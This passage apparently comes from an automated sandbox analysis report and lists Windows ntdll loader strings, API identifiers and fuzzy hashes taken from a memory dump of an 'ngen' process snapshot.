                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 057BB632
                                                                                                                      • GlobalFlag, xrefs: 057BB68F
                                                                                                                      • @, xrefs: 057BB670
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                      • API String ID: 0-4192008846
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 057A1A51
                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 057A1A40
                                                                                                                      • LdrpInitializeTls, xrefs: 057A1A47
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-931879808
                                                                                                                      Strings
                                                                                                                      • LdrpInitializationFailure, xrefs: 057B20FA
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 057B20F3
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 057B2104
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 0-233714265
                                                                                                                      Strings
                                                                                                                      • kLsE, xrefs: 05730540
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0573063D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 0-2547482624
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                      • API String ID: 0-118005554
                                                                                                                      Strings
                                                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 057A2A90
                                                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 057A2A95
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                      • API String ID: 0-2653619699
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      • API String ID: 0-2202222882
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: verifier.dll
                                                                                                                      • API String ID: 0-3265496382
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kLsE
                                                                                                                      • API String ID: 0-3058123920
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 0-1885708031
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx
                                                                                                                      • API String ID: 0-89312691
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrCreateEnclave
                                                                                                                      • API String ID: 0-3262589265
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86bb48cf41f43fef954d651d431adddcd5c8222a76bac3cdfad10bd7fddf10ec
                                                                                                                      • Instruction ID: 4e2d2f6bc9d93c916f3ebd2f744b21c4c8f8efd59de3374c8862315a1be29b7e
                                                                                                                      • Opcode Fuzzy Hash: 86bb48cf41f43fef954d651d431adddcd5c8222a76bac3cdfad10bd7fddf10ec
                                                                                                                      • Instruction Fuzzy Hash: D471BE797046418FC715DF28C488B2AB7E6FF88310F0485AAF8998B752DB34D856DFA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                      • Instruction ID: 3b54f02d6d416be7243919712057ba9c85962d0600846f4c6df689d14a018f25
                                                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                      • Instruction Fuzzy Hash: 31714C71A00619EFDB10DFA5C988FEEBBB9FF48700F104569E505A7290EB74EA41DB50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4e4d3ec8f249a36fe8c9664c0f02af190c99ec87bf43608fcf199c185721646d
                                                                                                                      • Instruction ID: 781f55af7d467209805139849a680657ceab809419a1ed34e0f625c5eda90199
                                                                                                                      • Opcode Fuzzy Hash: 4e4d3ec8f249a36fe8c9664c0f02af190c99ec87bf43608fcf199c185721646d
                                                                                                                      • Instruction Fuzzy Hash: C061BC71704716ABD725DF64C888FABBBA9FF88710F004629FA5987340DB30E910EB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a8c5f984d97dcc7300bf44c4008fe9aef646091db765436622b61531a621c18
                                                                                                                      • Instruction ID: 304d7d94fa874d2a39cad9f65a1140acd3c6ff912f9825b692afc6e7cefe7413
                                                                                                                      • Opcode Fuzzy Hash: 1a8c5f984d97dcc7300bf44c4008fe9aef646091db765436622b61531a621c18
                                                                                                                      • Instruction Fuzzy Hash: A9614FB5B00606AFDB1CDF69C485AADFBB6FF48310F14816AD419A7341DB30AA51DBD0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d7253a33dd7aea7dd498ada23a6942b06aadfa1df488a14eeffc5d909196fef
                                                                                                                      • Instruction ID: f64e9e1c941c83aab7e1aff87c464df3d5485a1ae921c4af058991e24ee393d5
                                                                                                                      • Opcode Fuzzy Hash: 0d7253a33dd7aea7dd498ada23a6942b06aadfa1df488a14eeffc5d909196fef
                                                                                                                      • Instruction Fuzzy Hash: 4B51E1B22042449FE734EF25C889F6B3BA8EB85320F10062DFD1197291DB30E941E7A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                      • Instruction ID: baecf8c9a4e1e1bf5543e0587740221cae0c07bb25624ccc462e2c5b672f4b67
                                                                                                                      • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                      • Instruction Fuzzy Hash: 7951D0772042129FCB26AF648C48A7B77B6FFC8790F040929F94587650E734C856EBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9d550ed08e7323f3bf54a8ce50e6959733e0ab496a309f842d2ffac7e0093be8
                                                                                                                      • Instruction ID: 03d5199593c7f8bc865a211fb4927a3953727f94ff5c46e533cb13366f68f8a6
                                                                                                                      • Opcode Fuzzy Hash: 9d550ed08e7323f3bf54a8ce50e6959733e0ab496a309f842d2ffac7e0093be8
                                                                                                                      • Instruction Fuzzy Hash: 87516D70A00208EFEF219FA4D885BADBBB5FF05310F60452AE994A7151DBB19848FF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b48c136db792339b4eb7f098d81fbd547078b7ace874727c45707c4e93ec0f9
                                                                                                                      • Instruction ID: 3ba2a0848a5c834a4491d760e83a778de46fa284cb9fd95089a13e96e6be811f
                                                                                                                      • Opcode Fuzzy Hash: 1b48c136db792339b4eb7f098d81fbd547078b7ace874727c45707c4e93ec0f9
                                                                                                                      • Instruction Fuzzy Hash: 06511075A04616AFC711CF68C484A6AB7B5FF04310F048AA5E899DB340E734E991DFE0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cd12cc41e3699aca44b46d1849957dd1c0799aff1344dc4cbf49ec06d10e6e1
                                                                                                                      • Instruction ID: f63d1380b7a255c1259c11e7d35b6af3c3ee756793d4cace8a6842882895e4b3
                                                                                                                      • Opcode Fuzzy Hash: 6cd12cc41e3699aca44b46d1849957dd1c0799aff1344dc4cbf49ec06d10e6e1
                                                                                                                      • Instruction Fuzzy Hash: B9516C75210A04DFCB21EF65C988F6AB7FEFF44740F500929E95697260D730E950EB60
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dda60ffd3fe381edc05338e2f402e20343a3e6b8a5f6e7e8b96f687bef037484
                                                                                                                      • Instruction ID: 6c0e822aa82f08a379e8e4bf1dc8a8b0c82baa58ab9d9aa51c0a580e40306e9c
                                                                                                                      • Opcode Fuzzy Hash: dda60ffd3fe381edc05338e2f402e20343a3e6b8a5f6e7e8b96f687bef037484
                                                                                                                      • Instruction Fuzzy Hash: 4D510476A10606EFDF19DF64C849BBDBBB6FF44321F104069E80393290EB749A11EB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                      • Instruction ID: 6746178bfddd322250f18a65974f83766c21c452015513d7416fc10d9081ab83
                                                                                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                      • Instruction Fuzzy Hash: D6518F71E04219AFCF15DFA4D844BEEBBB6EF45360F044069E905AB240D7B4E984DBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 02f5f37c9af66c4b6d1aabd4b9a5e27244b4d87aec9c0cd0d106c03ac7e3d611
                                                                                                                      • Instruction ID: d0663895707fca83f9ec8b3806a2fc7b1dd04332c30e5d3617dc343f3bb2002b
                                                                                                                      • Opcode Fuzzy Hash: 02f5f37c9af66c4b6d1aabd4b9a5e27244b4d87aec9c0cd0d106c03ac7e3d611
                                                                                                                      • Instruction Fuzzy Hash: DB51AD71B15215DFDF25DBA9D84AFBDB7B1BF08728F100018E812E7242DBB5A940EB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dd4eab19a6728c71195e4a69558f9c2c824ce62fe9a1a9c52083a46b3e186fd4
                                                                                                                      • Instruction ID: 39fceb577d25228fa600675fbcbe1e6542f9e23688ca5c92395b4f990e2c18d1
                                                                                                                      • Opcode Fuzzy Hash: dd4eab19a6728c71195e4a69558f9c2c824ce62fe9a1a9c52083a46b3e186fd4
                                                                                                                      • Instruction Fuzzy Hash: 82417472E04229AFCB26DBA49848EBFB6BDAF04650F450566ED05E7204D734DE00EBE5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                      • Instruction ID: 4e89e261b9ed48dff8bba1fc6c92012398ca7450601efc7f775ec5ed5dbc4b12
                                                                                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                      • Instruction Fuzzy Hash: F7517A7160060AEFCB56CF54C984A66BBB6FF45308F1584BAE808DF262E771ED45CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 53c41beda8d0b5f058191318b4889e31f31b969172fd3ff945c25147ac7dd057
                                                                                                                      • Instruction ID: 93fe89b8e57d92418434f6a9368b4562e64dbd1dce98aa38d640de31f9e2cabd
                                                                                                                      • Opcode Fuzzy Hash: 53c41beda8d0b5f058191318b4889e31f31b969172fd3ff945c25147ac7dd057
                                                                                                                      • Instruction Fuzzy Hash: 8D51CE72708690CFCB25CB19D448F6A73E6FB44BA4F0908A5F8168B692D738DC40EB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 45a10055cbf1b99ad3fca4326c5e72573012fabe7fc53bf5d61940e49d45d2ba
                                                                                                                      • Instruction ID: 9c467ed88f4022fc564fbb45c168b0ae682f3e0a1712c6da9799f02a01c79d8a
                                                                                                                      • Opcode Fuzzy Hash: 45a10055cbf1b99ad3fca4326c5e72573012fabe7fc53bf5d61940e49d45d2ba
                                                                                                                      • Instruction Fuzzy Hash: 0641BE36A01219DBCB14DF99C448AEEB7B5BF88710F14826EEC16F7240D735AD41EBA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction ID: 15f152d70dd11111b85372a763aaf7895acf7a9bc1e6ac5b0e01244e8459fdcf
                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                      • Instruction Fuzzy Hash: CF515D76E00615DFCB14CF98C584AAEF7B2FF84710F2482A9D816A7750D730AE82DB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction ID: 11642cbdb9b486932a205be16a9c2a8549022b14f3b1940866c2ee9a08f731dc
                                                                                                                      • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                                                                      • Instruction Fuzzy Hash: 98512A76A04205DFCB18CF68C581AA9BBF1FF88314B14866ED81AD7745E734EA50DF90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 62c04b6bc7b9266ecfdeceae02494120151b63fbbdb5d36664ff5c021e9c0b81
                                                                                                                      • Instruction ID: 1c9ec03732cd270dd4ddacb5561a92fd3707acf1c3b72f240e74b5d9defb5197
                                                                                                                      • Opcode Fuzzy Hash: 62c04b6bc7b9266ecfdeceae02494120151b63fbbdb5d36664ff5c021e9c0b81
                                                                                                                      • Instruction Fuzzy Hash: 8E51E770A04556ABDB25DB64CC0DFB8BBB2FF05324F1482A5D529976C2EB345981EF80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cb1c8d1ae6e9b1670fb2128930d7dd8b1a2c399cbb095c6a912adf13207afe54
                                                                                                                      • Instruction ID: 17aa916d91c49302e8f906d50b3ac150c9101e345ea99483ffa0ec0fa2bcbea5
                                                                                                                      • Opcode Fuzzy Hash: cb1c8d1ae6e9b1670fb2128930d7dd8b1a2c399cbb095c6a912adf13207afe54
                                                                                                                      • Instruction Fuzzy Hash: 95416D71680711EFDB22EF65C988F2ABBE9FB04794F048469E9159B250E770DC40EFA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction ID: 4f6e38de26a09b095684dbc529f00fe6146ecfa7d71a8e7a6e45115b676d1099
                                                                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                      • Instruction Fuzzy Hash: A541B275B00205AFDB15DF99CC89BBFBBBABF88600F144069EA05A7341DB70DD01A7A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ebc136fb7d31669315c694d41bac54da6423129cee72ba3f4f98b5fc8c79b81d
                                                                                                                      • Instruction ID: aa862aebfdecffc90608a9d19dbf81278852c4066cb81fe0dcf923fc7ade691f
                                                                                                                      • Opcode Fuzzy Hash: ebc136fb7d31669315c694d41bac54da6423129cee72ba3f4f98b5fc8c79b81d
                                                                                                                      • Instruction Fuzzy Hash: B941D031A58204CFCF25DF68D494BAD7BB1FB48361F144265EC12BB291DB74A940EFA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23eb2ac33aa0dc62264872a932612c9d9b562cbe12a6466dd58fec9ddfeabfad
                                                                                                                      • Instruction ID: cf874b06d3c5141de8400031ebcd29d1f3cb107b62e75267ad63407b32a18555
                                                                                                                      • Opcode Fuzzy Hash: 23eb2ac33aa0dc62264872a932612c9d9b562cbe12a6466dd58fec9ddfeabfad
                                                                                                                      • Instruction Fuzzy Hash: 9541E3712142009FDB35EF25D899F6ABBA9FB44330F00452DFC15872A1DB30E941EBA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction ID: 45ac426eae019e54815942ed1dbb9b428091388b7222209e391a774383051c79
                                                                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                      • Instruction Fuzzy Hash: 79414A71B04221DBCB30EE658448BBAB773FB50714F55806AE8498B240E7719D80FB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction ID: f1075459b7347d34481df550c33b9d1df2163dbdde37a604d682ffec195d2af4
                                                                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                      • Instruction Fuzzy Hash: 46418D75A00705EFCB24CF98C988AAAB7F5FF18700B10496DE956D7250E330EA44DF91
                                                                                                                      Memory Dump Source
